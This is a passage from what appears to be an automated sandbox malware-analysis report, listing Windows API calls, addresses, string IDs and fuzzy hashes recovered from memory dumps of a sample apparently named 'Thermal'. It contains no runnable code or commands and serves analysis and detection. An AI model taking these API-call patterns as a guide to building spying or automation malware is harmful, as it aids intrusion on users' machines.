                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: CreateHandle$FilePipe
                                                      • String ID: nul
                                                      • API String ID: 4209266947-2873401336
                                                      • Opcode ID: 44a23ee51a714dc1dc6825f48a8dbcbc83200de026db9b2ae41bf7738732010f
                                                      • Instruction ID: 04f02c9f1ffe8bf7680dd64d278e7db513ad1be795d804f121f93d472cc15692
                                                      • Opcode Fuzzy Hash: 44a23ee51a714dc1dc6825f48a8dbcbc83200de026db9b2ae41bf7738732010f
                                                      • Instruction Fuzzy Hash: 4721907050830AABDB20AF68DC45A9A7BA4BF54720F304A19FCA1D72E0D770DA50DF51
                                                      APIs
                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00187444
                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00187476
                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00187487
                                                      • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 001874C1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: CreateHandle$FilePipe
                                                      • String ID: nul
                                                      • API String ID: 4209266947-2873401336
                                                      • Opcode ID: b14e344e189fe8b17dfde253fd65e431ed2f56e730f87d797add3fa2a4e54797
                                                      • Instruction ID: a8f0ea77e0e19b487ee3b501d0b6b7c126a6b8d6475a53f0eb565e87fc469deb
                                                      • Opcode Fuzzy Hash: b14e344e189fe8b17dfde253fd65e431ed2f56e730f87d797add3fa2a4e54797
                                                      • Instruction Fuzzy Hash: 3321A1316083069BDB20AF689C48A9ABBA8AF55730F300B19F9B1D72D0DB70DA54CF50
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 0018B297
                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0018B2EB
                                                      • __swprintf.LIBCMT ref: 0018B304
                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000,001B0980), ref: 0018B342
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$InformationVolume__swprintf
                                                      • String ID: %lu
                                                      • API String ID: 3164766367-685833217
                                                      • Opcode ID: e6103f90f455730b69c347eba7f09b426e4022185f39217cf7ef99a6cf0d8e3f
                                                      • Instruction ID: 233244721ae741bdd83ec03ad2e8e644a40d9f50176b178caac2ebd8cbfc82c1
                                                      • Opcode Fuzzy Hash: e6103f90f455730b69c347eba7f09b426e4022185f39217cf7ef99a6cf0d8e3f
                                                      • Instruction Fuzzy Hash: 42214434600209AFCB10EFA5D985DAEB7B8EF89704B104069F905D7351DB31EA45CB61
                                                      APIs
                                                        • Part of subcall function 00131821: _memmove.LIBCMT ref: 0013185B
                                                        • Part of subcall function 0017AA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0017AA6F
                                                        • Part of subcall function 0017AA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 0017AA82
                                                        • Part of subcall function 0017AA52: GetCurrentThreadId.KERNEL32 ref: 0017AA89
                                                        • Part of subcall function 0017AA52: AttachThreadInput.USER32(00000000), ref: 0017AA90
                                                      • GetFocus.USER32 ref: 0017AC2A
                                                        • Part of subcall function 0017AA9B: GetParent.USER32(?), ref: 0017AAA9
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 0017AC73
                                                      • EnumChildWindows.USER32(?,0017ACEB), ref: 0017AC9B
                                                      • __swprintf.LIBCMT ref: 0017ACB5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                      • String ID: %s%d
                                                      • API String ID: 1941087503-1110647743
                                                      • Opcode ID: 1914a15a85307bc8001b70ab1709c215bd9dee7992b3a655eebd9ff42491bc8c
                                                      • Instruction ID: 17d8fa4186795974f926e90ee0d680231921346cd1124c27d60294a26e197a55
                                                      • Opcode Fuzzy Hash: 1914a15a85307bc8001b70ab1709c215bd9dee7992b3a655eebd9ff42491bc8c
                                                      • Instruction Fuzzy Hash: A4119D75600205BBDF12AFA08D85FEE777CAF98710F1080A5FE0CAA142DB7099459B75
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?), ref: 00182318
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: BuffCharUpper
                                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                      • API String ID: 3964851224-769500911
                                                      • Opcode ID: 0add337a5491428d35e245cb36e283b304fd571d4b86918e08bfe05983afe106
                                                      • Instruction ID: 3f2cc0ad994214371ea82aa98901b0d0e4a0e72bf6c948a1dc1367a143db1227
                                                      • Opcode Fuzzy Hash: 0add337a5491428d35e245cb36e283b304fd571d4b86918e08bfe05983afe106
                                                      • Instruction Fuzzy Hash: 2B113C34900119DBCF01EF94D9A18EEB7B4FF29344B108469D81667261EB365E0ADF50
                                                      APIs
                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0019F2F0
                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0019F320
                                                      • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0019F453
                                                      • CloseHandle.KERNEL32(?), ref: 0019F4D4
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                      • String ID:
                                                      • API String ID: 2364364464-0
                                                      • Opcode ID: ba68c645b613dcae69456a4bab77a20b3ae19d64a82bbbb71352559ae11013cb
                                                      • Instruction ID: 172ef8df7557b65104e3d2cc105c5fb38c4443d27424a00e00ba69d8e583f48b
                                                      • Opcode Fuzzy Hash: ba68c645b613dcae69456a4bab77a20b3ae19d64a82bbbb71352559ae11013cb
                                                      • Instruction Fuzzy Hash: A6819171600310AFD720EF68E886F2AB7E5AF58710F14891DF999DB292D770EC518F51
                                                      APIs
                                                        • Part of subcall function 00131A36: _memmove.LIBCMT ref: 00131A77
                                                        • Part of subcall function 001A147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001A040D,?,?), ref: 001A1491
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001A075D
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001A079C
                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 001A07E3
                                                      • RegCloseKey.ADVAPI32(?,?), ref: 001A080F
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 001A081C
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                      • String ID:
                                                      • API String ID: 3440857362-0
                                                      • Opcode ID: 8a1c14d908c027e239a96fe842f35e338c692fdc30693a9f1c4cdaf24e818bfd
                                                      • Instruction ID: 076f3df146d03b5f88c2580938e976b2b71181333ddd4c37bfc5d7e6d8e95679
                                                      • Opcode Fuzzy Hash: 8a1c14d908c027e239a96fe842f35e338c692fdc30693a9f1c4cdaf24e818bfd
                                                      • Instruction Fuzzy Hash: 0D515875208204AFD705EFA4C891E6BB7E9BF99304F04891DF595872A1DB30E944CB52
                                                      APIs
                                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0018EC62
                                                      • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0018EC8B
                                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0018ECCA
                                                        • Part of subcall function 00124D37: __itow.LIBCMT ref: 00124D62
                                                        • Part of subcall function 00124D37: __swprintf.LIBCMT ref: 00124DAC
                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0018ECEF
                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0018ECF7
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                      • String ID:
                                                      • API String ID: 1389676194-0
                                                      • Opcode ID: f0107e98fb3a2ff5a90fd3ba454f650bf8cc837fed4be755a72a56d1c15e30be
                                                      • Instruction ID: 193baeaa1deede02974d73a3116453b727278646e2d40982ec9a6eb814b6ea47
                                                      • Opcode Fuzzy Hash: f0107e98fb3a2ff5a90fd3ba454f650bf8cc837fed4be755a72a56d1c15e30be
                                                      • Instruction Fuzzy Hash: F1512A35A00519EFCB01EFA4D985AAEBBF5EF18314B148099F809AB3A1CB31ED55DF50
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6d24e5f80c0eed0fd529baa533efa6dd9658c529f9aace3574090ad0632c7463
                                                      • Instruction ID: a85fc6ab76a45aff0904159501f9d971a3580e107f5c730583356018fcf6237b
                                                      • Opcode Fuzzy Hash: 6d24e5f80c0eed0fd529baa533efa6dd9658c529f9aace3574090ad0632c7463
                                                      • Instruction Fuzzy Hash: 0C41067D900204AFD714CBA4CC88FBBBBB4EF0A320F950255F916A72D1C7719D41DA51
                                                      APIs
                                                      • GetCursorPos.USER32(?), ref: 00122727
                                                      • ScreenToClient.USER32(001E77B0,?), ref: 00122744
                                                      • GetAsyncKeyState.USER32(00000001), ref: 00122769
                                                      • GetAsyncKeyState.USER32(00000002), ref: 00122777
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: AsyncState$ClientCursorScreen
                                                      • String ID:
                                                      • API String ID: 4210589936-0
                                                      • Opcode ID: 3608984ad88c3f681636ca485f8792b806eb8c60b2e5bdd09f7057327047bc5c
                                                      • Instruction ID: 8ec808764fe0dd3ffa41084b73d7b002b4e9fa994c4b8a750000523d7f6b74b2
                                                      • Opcode Fuzzy Hash: 3608984ad88c3f681636ca485f8792b806eb8c60b2e5bdd09f7057327047bc5c
                                                      • Instruction Fuzzy Hash: 67415E35508219FFDF199FA8C844EEDBB74FB15325F10831AF82896290C730ADA4DB91
                                                      APIs
                                                      • GetWindowRect.USER32(?,?), ref: 001795E8
                                                      • PostMessageW.USER32(?,00000201,00000001), ref: 00179692
                                                      • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0017969A
                                                      • PostMessageW.USER32(?,00000202,00000000), ref: 001796A8
                                                      • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 001796B0
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: MessagePostSleep$RectWindow
                                                      • String ID:
                                                      • API String ID: 3382505437-0
                                                      • Opcode ID: 06180584bdae67dcdcf5f591874cf1972bf2a749dcf3420acb4303fb59246ba2
                                                      • Instruction ID: 239a64b516ae9c0e79acfa29303592de8ecfb067ed148eec450b9b0567c9e12c
                                                      • Opcode Fuzzy Hash: 06180584bdae67dcdcf5f591874cf1972bf2a749dcf3420acb4303fb59246ba2
                                                      • Instruction Fuzzy Hash: 87319C71900219EBDB14CF68D94DA9E7BB5EB49315F108319F929AA2D0C3B0D968DB90
                                                      APIs
                                                        • Part of subcall function 001229E2: GetWindowLongW.USER32(?,000000EB), ref: 001229F3
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 001AB804
                                                      • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 001AB829
                                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 001AB841
                                                      • GetSystemMetrics.USER32(00000004), ref: 001AB86A
                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0019155C,00000000), ref: 001AB888
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Window$Long$MetricsSystem
                                                      • String ID:
                                                      • API String ID: 2294984445-0
                                                      • Opcode ID: af9804e53bcb1fd7ffc2de8a950c01653262be97e4d43412d30110580d70845e
                                                      • Instruction ID: b643e425036b906de6d9b74e0151b809600635f6fec6704321bd097201a99d36
                                                      • Opcode Fuzzy Hash: af9804e53bcb1fd7ffc2de8a950c01653262be97e4d43412d30110580d70845e
                                                      • Instruction Fuzzy Hash: 6821E5359182A5AFCB249F7CDC88B6A37A8FB06320F114738F921D75E2D3348860CB90
                                                      APIs
                                                      • IsWindow.USER32(00000000), ref: 00196159
                                                      • GetForegroundWindow.USER32 ref: 00196170
                                                      • GetDC.USER32(00000000), ref: 001961AC
                                                      • GetPixel.GDI32(00000000,?,00000003), ref: 001961B8
                                                      • ReleaseDC.USER32(00000000,00000003), ref: 001961F3
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Window$ForegroundPixelRelease
                                                      • String ID:
                                                      • API String ID: 4156661090-0
                                                      • Opcode ID: 116c472aea96ab01d6bf50680eb10c6ea3e157a8cc8e85770abd4bfc5af38bd0
                                                      • Instruction ID: 7865b0c014ba60f3af7e5257e1b0c9356c1993ae54b0e3839abdbc8d0511dbc9
                                                      • Opcode Fuzzy Hash: 116c472aea96ab01d6bf50680eb10c6ea3e157a8cc8e85770abd4bfc5af38bd0
                                                      • Instruction Fuzzy Hash: 4E218475A002049FDB14EF65DD84A9AB7F5EF98350F048479F94AD7662CB30AD41CB90
                                                      APIs
                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00121729
                                                      • SelectObject.GDI32(?,00000000), ref: 00121738
                                                      • BeginPath.GDI32(?), ref: 0012174F
                                                      • SelectObject.GDI32(?,00000000), ref: 00121778
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ObjectSelect$BeginCreatePath
                                                      • String ID:
                                                      • API String ID: 3225163088-0
                                                      • Opcode ID: e30a8c02c7b6ebcf173f729879f92fb8cfb5bfe550326abcf14bc807c18807b0
                                                      • Instruction ID: e511b86e7b25858e243b293d1e5724dc74cd66e6c6993ae1eb9e2809a3a317fb
                                                      • Opcode Fuzzy Hash: e30a8c02c7b6ebcf173f729879f92fb8cfb5bfe550326abcf14bc807c18807b0
                                                      • Instruction Fuzzy Hash: 7121AF30804258FBEB11DFA4FC88F6E7BA9FB64361F144216F8159A5E0D77198E2CB90
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: _memcmp
                                                      • String ID:
                                                      • API String ID: 2931989736-0
                                                      • Opcode ID: 1898697b268d90c103512e8b8c8cb8ceb70181bd0ad3152d5fbdf5fc9ef7b7fe
                                                      • Instruction ID: 241fe9b8a1864f105ad34444bbacf00cd390f71fcd83245ca35528ef245f97fa
                                                      • Opcode Fuzzy Hash: 1898697b268d90c103512e8b8c8cb8ceb70181bd0ad3152d5fbdf5fc9ef7b7fe
                                                      • Instruction Fuzzy Hash: 0201B572A401157BD3146611ED82FFB777CAB70394F15802EFE1A96746F7A0DE2182E2
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 00185075
                                                      • __beginthreadex.LIBCMT ref: 00185093
                                                      • MessageBoxW.USER32(?,?,?,?), ref: 001850A8
                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 001850BE
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 001850C5
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                      • String ID:
                                                      • API String ID: 3824534824-0
                                                      • Opcode ID: 65bc38b3fc3a33849b271b3d43c6d46db3d54a9de79f1832f397b7f8eb180099
                                                      • Instruction ID: ebe0a0e40bbd8f020062779a79eac24ffe5b49caf794eb6a7a1453cdcdcc6d5e
                                                      • Opcode Fuzzy Hash: 65bc38b3fc3a33849b271b3d43c6d46db3d54a9de79f1832f397b7f8eb180099
                                                      • Instruction Fuzzy Hash: A411E572908749ABD7019BE89C44AAF7BADEB49320F140355F915D76A0D7718A808BE0
                                                      APIs
                                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00178E3C
                                                      • GetLastError.KERNEL32(?,00178900,?,?,?), ref: 00178E46
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00178900,?,?,?), ref: 00178E55
                                                      • HeapAlloc.KERNEL32(00000000,?,00178900,?,?,?), ref: 00178E5C
                                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00178E73
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                      • String ID:
